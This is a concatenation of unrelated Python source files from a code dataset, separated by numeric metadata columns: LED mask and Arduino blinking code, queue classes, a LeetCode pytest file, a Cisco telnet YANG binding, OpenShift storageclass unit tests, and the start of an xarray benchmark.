led_list.sort()
# get the last one
newest_folder = led_list[-1]
# and make a folder
constant_folder = '/media/chrelli/Data0/'+newest_folder #TODO fix this shit!
# now read the masks
which_label = 'auto_led'
led_mask = cv2.imread(constant_folder+'/dev'+str(which_device)+'_roi_frame_'+which_label+'.png',0)
# also return a logical
led_logic = led_mask > 0
# and the central pixel of the largest binary region
img, contours, hierarchy = cv2.findContours(led_mask.copy(),cv2.RETR_TREE,cv2.CHAIN_APPROX_NONE)
# calculate the momnets and centroids
moments = [cv2.moments(cnt) for cnt in contours]
# get the size of the regions
region_size = np.empty(len(contours))
for i in range(len(contours)):
region_size[i] = np.shape(contours[i])[0]
# biggest region
biggest_region = np.argmax(region_size)
M = moments[biggest_region]
# this is in the cv2 coordinate system!! not matrix notation
# get the centroid of the LED like this:
led_centroid = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))
return led_mask,led_logic,led_centroid
def load_auto_roi_with_background(which_device):
# simply look for the most recent LED folder!
top_folder = '/media/chrelli/Data0'
# get a list of the folders in that directory
folder_list = next(os.walk(top_folder))[1]
logic_list = [x[0:8] == 'led_mask' for x in folder_list]
led_list = list(compress(folder_list,logic_list))
led_list.sort()
# get the last one
newest_folder = led_list[-1]
# and make a folder
constant_folder = '/media/chrelli/Data0/'+newest_folder #TODO fix this shit!
# now read the masks
which_label = 'auto_led'
led_mask = cv2.imread(constant_folder+'/dev'+str(which_device)+'_roi_frame_'+which_label+'.png',0)
# also return a logical
led_logic = led_mask > 0
# and the central pixel of the largest binary region
img, contours, hierarchy = cv2.findContours(led_mask.copy(),cv2.RETR_TREE,cv2.CHAIN_APPROX_NONE)
# calculate the momnets and centroids
moments = [cv2.moments(cnt) for cnt in contours]
# get the size of the regions
region_size = np.empty(len(contours))
for i in range(len(contours)):
region_size[i] = np.shape(contours[i])[0]
# biggest region
biggest_region = np.argmax(region_size)
M = moments[biggest_region]
# this is in the cv2 coordinate system!! not matrix notation
# get the centroid of the LED like this:
led_centroid = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))
# also load the median depth
which_label = 'median depth'
d_median = np.load(constant_folder+'/dev'+str(which_device)+'_roi_frame_'+which_label+'.npy')
return led_mask,led_logic,led_centroid,d_median
# function to read the roi file
def read_roi_file(which_device):
# LOOK for the most recent folder
# simply look for the most recent LED folder!
top_folder = '/media/chrelli/Data0'
# get a list of the folders in that directory
folder_list = next(os.walk(top_folder))[1]
logic_list = [x[0:8] == 'roi_mask' for x in folder_list]
led_list = list(compress(folder_list,logic_list))
led_list.sort()
# get the last one
newest_folder = led_list[-1]
# and make a folder
constant_folder = '/media/chrelli/Data0/'+newest_folder #TODO fix this shit!
this_name = constant_folder+'/dev'+str(which_device)+'_cad_roi.csv'
if os.path.exists(this_name):
roi_values = np.genfromtxt(this_name, delimiter=',',dtype='int' )
else:
print('ERROR: '+ this_name+' not found!')
sys.exit(0)
return roi_values
def single_pixel_RGB2GRAY(rgb):
# uses same weighting as cv2
gray = 0.299*rgb[0] + 0.587*rgb[1] + 0.114*rgb[2]
return gray
# also define the firmata
def blink_using_firmata():
# for getting the port
import serial, sys
# for running firmata
from pyfirmata import Arduino, util
import time
import os
# handle keyboard interrupt for quitting the program
import signal
import sys
# define a graceful way to exit if no frames a being shown
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
board.digital[which_pin].write(False)
print('cleaned headers!')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
print('Press Ctrl+C to stop recording')
# get the serial port for firmata
# double - todo not good
def get_serial_port():
ser_devs = [dev for dev in os.listdir('/dev') if dev.startswith('ttyAC')]
if len(ser_devs) > 0:
return '/dev/'+ser_devs[0]
return None
# run the function to get the port
port = get_serial_port()
# and open connection using pyfirmata
print('opening '+port+'...')
board = Arduino(port)
print(port+' is open.')
# use the 12th pin for the blinking
which_pin = 12
# what is the time in s pr blink
blink_time = 0.150
# start by setting it down
board.digital[which_pin].write(0)
# and wait a moment for the cams to start running
initial_waiting = 0
print('arduino waiting for '+str(initial_waiting)+' seconds.')
time.sleep(initial_waiting)
# and now just run the blinking loop
print('starting blink every '+str(blink_time) +' s on pin '+str(which_pin)+'.')
while True:
time.sleep(blink_time)
board.digital[which_pin].write(0)
time.sleep(blink_time)
board.digital[which_pin].write(1)
# also define the firmata
def blink_using_firmata_random():
# for getting the port
import serial, sys
# for running firmata
from pyfirmata import Arduino, util
import time
import os
# handle keyboard interrupt for quitting the program
import signal
import sys
# define a graceful way to exit if no frames a being shown
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
board.digital[which_pin].write(False)
print('cleaned headers!')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
print('Press Ctrl+C to stop recording')
# get the serial port for firmata
# double - todo not good
def get_serial_port():
ser_devs = [dev for dev in os.listdir('/dev') if dev.startswith('ttyAC')]
if len(ser_devs) > 0:
return '/dev/'+ser_devs[0]
return None
# run the function to get the port
port = get_serial_port()
# and open connection using pyfirmata
print('opening '+port+'...')
board = Arduino(port)
print(port+' is open.')
# use the 12th pin for the blinking
which_pin = 12
# what is the time in s pr blink
blink_time = 0.150
# start by setting it down
board.digital[which_pin].write(0)
# and wait a moment for the cams to start running
initial_waiting = 0
print('arduino waiting for '+str(initial_waiting)+' seconds.')
time.sleep(initial_waiting)
# and now just run the blinking loop
print('starting blink every '+str(blink_time) +' s on pin '+str(which_pin)+'.')
while True:
time.sleep(blink_time)
board.digital[which_pin].write(0)
time.sleep(blink_time+np.random.uniform(low = 0.0, high = .200))
board.digital[which_pin].write(1)
#%% also define the firmata
def blink_using_firmata_random_sound():
# for getting the port
import serial, sys
# for running firmata
from pyfirmata import Arduino, util
import time
import os
# handle keyboard interrupt for quitting the program
import signal
import sys
# define a graceful way to exit if no frames a being shown
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
board.digital[which_pin].write(False)
print('cleaned headers!')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
print('Press Ctrl+C to stop recording')
# get the serial port for firmata
# double - todo not good
def get_serial_port():
ser_devs = [dev for dev in os.listdir('/dev') if dev.startswith('ttyAC')]
if len(ser_devs) > 0:
return '/dev/'+ser_devs[0]
return None
def buzz_piezo():
audio_time = 1/100.
# do four quick BEEPS
for _ in range(40):
board.digital[9].write(0)
time.sleep(audio_time)
board.digital[9].write(1)
time.sleep(audio_time)
board.digital[9].write(0)
def beep_speaker():
beep_time = .1
# do four quick BEEPS
board.digital[10].write(0)
board.digital[10].write(1)
time.sleep(beep_time)
board.digital[10].write(0)
# buzz_piezo()
# beep_speaker()
# run the function to get the port
port = get_serial_port()
# and open connection using pyfirmata
print('opening '+port+'...')
board = Arduino(port)
print(port+' is open.')
# use the 12th pin for the blinking
which_pin = 12
# what is the time in s pr blink
blink_time = 0.150
# start by setting it down
board.digital[which_pin].write(0)
# and wait a moment for the cams to start running
initial_waiting = 0
print('arduino waiting for '+str(initial_waiting)+' seconds.')
time.sleep(initial_waiting)
# and now just run the blinking loop
print('starting blink every '+str(blink_time) +' s on pin '+str(which_pin)+'.')
blink_counter = 0
next_blink = 20
while True:
# for _ in range(300):
# these are the LED blinks:
time.sleep(blink_time)
board.digital[which_pin].write(0)
time.sleep(blink_time+np.random.uniform(low = 0.0, high = .200))
board.digital[which_pin].write(1)
# update the blink counter
blink_counter += 1
if blink_counter > next_blink:
# Give a buzz every ~30 blinks
# buzz_piezo()
beep_speaker()
# and reset the blinking counter
blink_counter = 0
# and pull a random next time for a buzz
next_blink = np.random.randint(25,50)
board.digital[which_pin].write(0)
| 30.856354
| 102
| 0.659355
| 1,639
| 11,170
| 4.360586
| 0.175717
| 0.031902
| 0.030922
| 0.036379
| 0.818385
| 0.807192
| 0.799216
| 0.790262
| 0.774591
| 0.774591
| 0
| 0.019224
| 0.240913
| 11,170
| 361
| 103
| 30.941828
| 0.823682
| 0.272337
| 0
| 0.77
| 0
| 0
| 0.096389
| 0.007846
| 0
| 0
| 0
| 0.00277
| 0
| 1
| 0.075
| false
| 0
| 0.155
| 0
| 0.28
| 0.11
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be097ec7d1ebfc7d1133660273e1ffc42e533294
| 3,933
|
py
|
Python
|
Code/queue.py
|
FritzHeider/CS-1.3-Core-Data-Structures
|
0978c540dc953ec4279cfe6947a975950ce47948
|
[
"MIT"
] | null | null | null |
Code/queue.py
|
FritzHeider/CS-1.3-Core-Data-Structures
|
0978c540dc953ec4279cfe6947a975950ce47948
|
[
"MIT"
] | 2
|
2020-03-04T00:34:42.000Z
|
2020-03-10T08:20:34.000Z
|
Code/queue.py
|
FritzHeider/CS-1.3-Core-Data-Structures
|
0978c540dc953ec4279cfe6947a975950ce47948
|
[
"MIT"
] | null | null | null |
from linkedlist import LinkedList
# Implement LinkedQueue below, then change the assignment at the bottom
# to use this Queue implementation to verify it passes all tests
class LinkedQueue(object):
def __init__(self, iterable=None):
"""Initialize this queue and enqueue the given items, if any."""
# Initialize a new linked list to store the items
self.list = LinkedList()
if iterable is not None:
for item in iterable:
self.enqueue(item)
def __repr__(self):
"""Return a string representation of this queue."""
return 'Queue({} items, front={})'.format(self.length(), self.front())
def is_empty(self):
"""Return True if this queue is empty, or False otherwise."""
if self.list.head is None:
return True
return False
def length(self):
"""Return the number of items in this queue."""
return self.list.size
def enqueue(self, item):
"""Insert the given item at the back of this queue.
Running time: O(1) – because it takes constant time to append to a
linked list with a tail pointer"""
self.list.append(item)
def front(self):
"""Return the item at the front of this queue without removing it,
or None if this queue is empty."""
if self.is_empty():
return None
return self.list.head.data
def dequeue(self):
"""Remove and return the item at the front of this queue,
or raise ValueError if this queue is empty.
Running time: O(1) – because it takes constant time to delete from the
front of a linked list"""
if self.is_empty():
raise ValueError
else:
front = self.list.head.data
self.list.delete(front)
return front
# Implement ArrayQueue below, then change the assignment at the bottom
# to use this Queue implementation to verify it passes all tests
class ArrayQueue(object):
def __init__(self, iterable=None):
"""Initialize this queue and enqueue the given items, if any."""
# Initialize a new list (dynamic array) to store the items
self.list = list()
self.start = -1
if iterable is not None:
for item in iterable:
self.enqueue(item)
def __repr__(self):
"""Return a string representation of this queue."""
return 'Queue({} items, front={})'.format(self.length(), self.front())
def is_empty(self):
"""Return True if this queue is empty, or False otherwise."""
if self.start == -1:
return True
return False
def length(self):
"""Return the number of items in this queue."""
return self.start + 1
def enqueue(self, item):
"""Insert the given item at the back of this queue.
Running time: O(n) - because each item in an array must be individually
shifted when prepending"""
self.list.insert(0, item)
self.start += 1
def front(self):
"""Return the item at the front of this queue without removing it,
or None if this queue is empty."""
if self.is_empty():
return None
return self.list[self.start]
def dequeue(self):
"""Remove and return the item at the front of this queue,
or raise ValueError if this queue is empty.
Running time: O(1) – because nothing gets moved or traversed, this takes
constant time"""
if self.is_empty():
raise ValueError
else:
front = self.list[self.start]
self.list[self.start] = None
self.start -= 1
return front
# Implement LinkedQueue and ArrayQueue above, then change the assignment below
# to use each of your Queue implementations to verify they each pass all tests
# Queue = LinkedQueue
Queue = LinkedQueue
| 34.80531
| 80
| 0.61734
| 536
| 3,933
| 4.494403
| 0.201493
| 0.07472
| 0.03653
| 0.032379
| 0.723537
| 0.723537
| 0.704442
| 0.704442
| 0.704442
| 0.704442
| 0
| 0.00327
| 0.30028
| 3,933
| 112
| 81
| 35.116071
| 0.871003
| 0.461226
| 0
| 0.644068
| 0
| 0
| 0.02572
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.237288
| false
| 0
| 0.016949
| 0
| 0.525424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
07b31e4d5a15ca561e2d14f056105447a6b78d17
| 1,330
|
py
|
Python
|
tests/test_1913.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1913.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1913.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1913. Maximum Product Difference Between Two Pairs
"""
@pytest.fixture(scope="session")
def init_variables_1913():
from src.leetcode_1913_maximum_product_difference_between_two_pairs import Solution
solution = Solution()
def _init_variables_1913():
return solution
yield _init_variables_1913
class TestClass1913:
def test_solution_0(self, init_variables_1913):
assert init_variables_1913().maxProductDifference([5, 6, 2, 7, 4]) == 34
def test_solution_1(self, init_variables_1913):
assert init_variables_1913().maxProductDifference([4, 2, 5, 9, 7, 4, 8]) == 64
#!/usr/bin/env python
import pytest
"""
Test 1913. Maximum Product Difference Between Two Pairs
"""
@pytest.fixture(scope="session")
def init_variables_1913():
from src.leetcode_1913_maximum_product_difference_between_two_pairs import Solution
solution = Solution()
def _init_variables_1913():
return solution
yield _init_variables_1913
class TestClass1913:
def test_solution_0(self, init_variables_1913):
assert init_variables_1913().maxProductDifference([5, 6, 2, 7, 4]) == 34
def test_solution_1(self, init_variables_1913):
assert init_variables_1913().maxProductDifference([4, 2, 5, 9, 7, 4, 8]) == 64
| 23.333333
| 87
| 0.72782
| 176
| 1,330
| 5.193182
| 0.238636
| 0.199125
| 0.260394
| 0.122538
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.105455
| 0.172932
| 1,330
| 56
| 88
| 23.75
| 0.725455
| 0.030075
| 0
| 1
| 0
| 0
| 0.012048
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.307692
| false
| 0
| 0.153846
| 0.076923
| 0.615385
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
07b8f5b65e0d8a462fc3a964db7483661dfd184b
| 6,848
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_telnet_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_telnet_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_telnet_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_ipv4_telnet_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR ipv4\-telnet package configuration.
This module contains definitions
for the following management objects\:
ipv6\-telnet\: IPv6 telnet configuration
ipv4\-telnet\: ipv4 telnet
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Ipv6Telnet(_Entity_):
"""
IPv6 telnet configuration
.. attribute:: client
Telnet client configuration
**type**\: :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_telnet_cfg.Ipv6Telnet.Client>`
"""
_prefix = 'ipv4-telnet-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ipv6Telnet, self).__init__()
self._top_entity = None
self.yang_name = "ipv6-telnet"
self.yang_parent_name = "Cisco-IOS-XR-ipv4-telnet-cfg"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("client", ("client", Ipv6Telnet.Client))])
self._leafs = OrderedDict()
self.client = Ipv6Telnet.Client()
self.client.parent = self
self._children_name_map["client"] = "client"
self._segment_path = lambda: "Cisco-IOS-XR-ipv4-telnet-cfg:ipv6-telnet"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ipv6Telnet, [], name, value)
class Client(_Entity_):
"""
Telnet client configuration
.. attribute:: source_interface
Source interface for telnet sessions
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
"""
_prefix = 'ipv4-telnet-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ipv6Telnet.Client, self).__init__()
self.yang_name = "client"
self.yang_parent_name = "ipv6-telnet"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_interface', (YLeaf(YType.str, 'source-interface'), ['str'])),
])
self.source_interface = None
self._segment_path = lambda: "client"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-telnet-cfg:ipv6-telnet/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ipv6Telnet.Client, ['source_interface'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_telnet_cfg as meta
return meta._meta_table['Ipv6Telnet.Client']['meta_info']
def clone_ptr(self):
self._top_entity = Ipv6Telnet()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_telnet_cfg as meta
return meta._meta_table['Ipv6Telnet']['meta_info']
class Ipv4Telnet(_Entity_):
"""
ipv4 telnet
.. attribute:: client
Telnet client configuration
**type**\: :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_telnet_cfg.Ipv4Telnet.Client>`
"""
_prefix = 'ipv4-telnet-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ipv4Telnet, self).__init__()
self._top_entity = None
self.yang_name = "ipv4-telnet"
self.yang_parent_name = "Cisco-IOS-XR-ipv4-telnet-cfg"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("client", ("client", Ipv4Telnet.Client))])
self._leafs = OrderedDict()
self.client = Ipv4Telnet.Client()
self.client.parent = self
self._children_name_map["client"] = "client"
self._segment_path = lambda: "Cisco-IOS-XR-ipv4-telnet-cfg:ipv4-telnet"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ipv4Telnet, [], name, value)
class Client(_Entity_):
"""
Telnet client configuration
.. attribute:: source_interface
Source interface for telnet sessions
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
"""
_prefix = 'ipv4-telnet-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Ipv4Telnet.Client, self).__init__()
self.yang_name = "client"
self.yang_parent_name = "ipv4-telnet"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_interface', (YLeaf(YType.str, 'source-interface'), ['str'])),
])
self.source_interface = None
self._segment_path = lambda: "client"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-telnet-cfg:ipv4-telnet/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Ipv4Telnet.Client, ['source_interface'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_telnet_cfg as meta
return meta._meta_table['Ipv4Telnet.Client']['meta_info']
def clone_ptr(self):
self._top_entity = Ipv4Telnet()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_telnet_cfg as meta
return meta._meta_table['Ipv4Telnet']['meta_info']
| 30.846847
| 126
| 0.614924
| 782
| 6,848
| 5.025575
| 0.157289
| 0.063613
| 0.050891
| 0.049873
| 0.845293
| 0.829771
| 0.805598
| 0.805598
| 0.805598
| 0.786768
| 0
| 0.021311
| 0.273657
| 6,848
| 221
| 127
| 30.986425
| 0.768798
| 0.155812
| 0
| 0.704918
| 0
| 0
| 0.113801
| 0.040101
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114754
| false
| 0
| 0.098361
| 0
| 0.327869
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07bc0d80a44bfbc533c5c1111c7a191c9aad1bef
| 6,980
|
py
|
Python
|
roles/lib_openshift/src/test/unit/test_oc_storageclass.py
|
Roscoe198/Ansible-Openshift
|
b874bef456852ef082a27dfec4f2d7d466702370
|
[
"Apache-2.0"
] | 164
|
2015-07-29T17:35:04.000Z
|
2021-12-16T16:38:04.000Z
|
roles/lib_openshift/src/test/unit/test_oc_storageclass.py
|
Roscoe198/Ansible-Openshift
|
b874bef456852ef082a27dfec4f2d7d466702370
|
[
"Apache-2.0"
] | 3,634
|
2015-06-09T13:49:15.000Z
|
2022-03-23T20:55:44.000Z
|
roles/lib_openshift/src/test/unit/test_oc_storageclass.py
|
Roscoe198/Ansible-Openshift
|
b874bef456852ef082a27dfec4f2d7d466702370
|
[
"Apache-2.0"
] | 250
|
2015-06-08T19:53:11.000Z
|
2022-03-01T04:51:23.000Z
|
'''
Unit tests for oc serviceaccount
'''
import os
import sys
import unittest
import mock
import yaml
# Removing invalid variable names for tests so that I can
# keep them brief
# pylint: disable=invalid-name,no-name-in-module
# Disable import-error b/c our libraries aren't loaded in jenkins
# pylint: disable=import-error
# place class in our python path
module_path = os.path.join('/'.join(os.path.realpath(__file__).split('/')[:-4]), 'library') # noqa: E501
sys.path.insert(0, module_path)
from oc_storageclass import OCStorageClass # noqa: E402
class OCStorageClassTest(unittest.TestCase):
'''
Test class for OCStorageClass
'''
@mock.patch('oc_storageclass.Utils.create_tmpfile')
@mock.patch('oc_storageclass.locate_oc_binary')
@mock.patch('oc_storageclass.Utils.create_tmpfile_copy')
@mock.patch('oc_storageclass.OCStorageClass._run')
def test_adding_a_storageclass_without_qualification(self, mock_cmd, mock_tmpfile_copy, mock_oc_binary, mock_tmpfile_create):
''' Testing adding a storageclass '''
# Arrange
# run_ansible input parameters
params = {
'kubeconfig': '/etc/origin/master/admin.kubeconfig',
'state': 'present',
'debug': False,
'name': 'testsc',
'provisioner': 'aws-ebs',
'annotations': {'storageclass.beta.kubernetes.io/is-default-class': "true"},
'parameters': {'type': 'gp2'},
'api_version': 'v1',
'default_storage_class': 'true',
'mount_options': ['debug'],
'reclaim_policy': 'Delete'
}
valid_result_json = '''{
"kind": "StorageClass",
"apiVersion": "v1",
"metadata": {
"name": "testsc",
"selfLink": "/apis/storage.k8s.io/v1/storageclasses/gp2",
"uid": "4d8320c9-e66f-11e6-8edc-0eece8f2ce22",
"resourceVersion": "2828",
"creationTimestamp": "2017-01-29T22:07:19Z",
"annotations": {"storageclass.beta.kubernetes.io/is-default-class": "true"}
},
"provisioner": "kubernetes.io/aws-ebs",
"parameters": {"type": "gp2"},
"mountOptions": ['debug'],
"reclaimPolicy": "Delete"
}'''
# Return values of our mocked function call. These get returned once per call.
mock_cmd.side_effect = [
# First call to mock
(1, '', 'Error from server: storageclass "testsc" not found'),
# Second call to mock
(0, 'storageclass "testsc" created', ''),
# Third call to mock
(0, valid_result_json, ''),
]
mock_oc_binary.side_effect = [
'oc'
]
mock_tmpfile_copy.side_effect = [
'/tmp/mocked_kubeconfig',
]
generated_yaml_spec_file = '/tmp/spec_output_yaml'
mock_tmpfile_create.side_effect = [
generated_yaml_spec_file,
]
# Act
results = OCStorageClass.run_ansible(params, False)
with open(generated_yaml_spec_file) as json_data:
generated_spec = yaml.load(json_data)
# Assert
self.assertTrue(generated_spec['provisioner'], 'kubernetes.io/aws-ebs')
self.assertTrue(results['changed'])
self.assertEqual(results['results']['returncode'], 0)
self.assertEqual(results['state'], 'present')
# Making sure our mock was called as we expected
mock_cmd.assert_has_calls([
mock.call(['oc', 'get', 'storageclass', 'testsc', '-o', 'json'], None),
mock.call(['oc', 'create', '-f', mock.ANY], None),
mock.call(['oc', 'get', 'storageclass', 'testsc', '-o', 'json'], None),
])
@mock.patch('oc_storageclass.Utils.create_tmpfile')
@mock.patch('oc_storageclass.locate_oc_binary')
@mock.patch('oc_storageclass.Utils.create_tmpfile_copy')
@mock.patch('oc_storageclass.OCStorageClass._run')
def test_adding_a_storageclass_with_qualification(self, mock_cmd, mock_tmpfile_copy, mock_oc_binary, mock_tmpfile_create):
''' Testing adding a storageclass '''
# Arrange
# run_ansible input parameters
params = {
'kubeconfig': '/etc/origin/master/admin.kubeconfig',
'state': 'present',
'debug': False,
'name': 'testsc',
'provisioner': 'kubernetes.io/aws-ebs',
'annotations': {'storageclass.beta.kubernetes.io/is-default-class': "true"},
'parameters': {'type': 'gp2'},
'api_version': 'v1',
'default_storage_class': 'true',
'mount_options': ['debug'],
'reclaim_policy': 'Delete'
}
valid_result_json = '''{
"kind": "StorageClass",
"apiVersion": "v1",
"metadata": {
"name": "testsc",
"selfLink": "/apis/storage.k8s.io/v1/storageclasses/gp2",
"uid": "4d8320c9-e66f-11e6-8edc-0eece8f2ce22",
"resourceVersion": "2828",
"creationTimestamp": "2017-01-29T22:07:19Z",
"annotations": {"storageclass.beta.kubernetes.io/is-default-class": "true"}
},
"provisioner": "kubernetes.io/aws-ebs",
"parameters": {"type": "gp2"},
"mountOptions": ['debug'],
"reclaimPolicy": "Delete"
}'''
# Return values of our mocked function call. These get returned once per call.
mock_cmd.side_effect = [
# First call to mock
(1, '', 'Error from server: storageclass "testsc" not found'),
# Second call to mock
(0, 'storageclass "testsc" created', ''),
# Third call to mock
(0, valid_result_json, ''),
]
mock_oc_binary.side_effect = [
'oc'
]
mock_tmpfile_copy.side_effect = [
'/tmp/mocked_kubeconfig',
]
generated_yaml_spec_file = '/tmp/spec_output_yaml'
mock_tmpfile_create.side_effect = [
generated_yaml_spec_file,
]
# Act
results = OCStorageClass.run_ansible(params, False)
with open(generated_yaml_spec_file) as json_data:
generated_spec = yaml.load(json_data)
# Assert
self.assertTrue(generated_spec['provisioner'], 'kubernetes.io/aws-ebs')
self.assertTrue(results['changed'])
self.assertEqual(results['results']['returncode'], 0)
self.assertEqual(results['state'], 'present')
# Making sure our mock was called as we expected
mock_cmd.assert_has_calls([
mock.call(['oc', 'get', 'storageclass', 'testsc', '-o', 'json'], None),
mock.call(['oc', 'create', '-f', mock.ANY], None),
mock.call(['oc', 'get', 'storageclass', 'testsc', '-o', 'json'], None),
])
| 34.9
| 129
| 0.575215
| 722
| 6,980
| 5.376731
| 0.257618
| 0.032458
| 0.022669
| 0.047398
| 0.874807
| 0.871716
| 0.871716
| 0.871716
| 0.871716
| 0.871716
| 0
| 0.020028
| 0.28467
| 6,980
| 199
| 130
| 35.075377
| 0.75746
| 0.121777
| 0
| 0.80916
| 0
| 0.015267
| 0.435234
| 0.166612
| 0
| 0
| 0
| 0
| 0.076336
| 1
| 0.015267
| false
| 0
| 0.045802
| 0
| 0.068702
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07bcc6d71b4a266654ba701275e8ad2b66116bc2
| 16,435
|
py
|
Python
|
asv_bench/benchmarks/dataset_io.py
|
DocOtak/xarray
|
01a9baa01b1378cbf3f324ea3c27150a3860d3d1
|
[
"Apache-2.0"
] | 1
|
2020-09-14T02:32:54.000Z
|
2020-09-14T02:32:54.000Z
|
asv_bench/benchmarks/dataset_io.py
|
DocOtak/xarray
|
01a9baa01b1378cbf3f324ea3c27150a3860d3d1
|
[
"Apache-2.0"
] | null | null | null |
asv_bench/benchmarks/dataset_io.py
|
DocOtak/xarray
|
01a9baa01b1378cbf3f324ea3c27150a3860d3d1
|
[
"Apache-2.0"
] | 2
|
2019-08-22T21:07:03.000Z
|
2020-03-30T10:25:00.000Z
|
from __future__ import absolute_import, division, print_function
import os
import numpy as np
import pandas as pd
import xarray as xr
from . import randint, randn, requires_dask
try:
import dask
import dask.multiprocessing
except ImportError:
pass
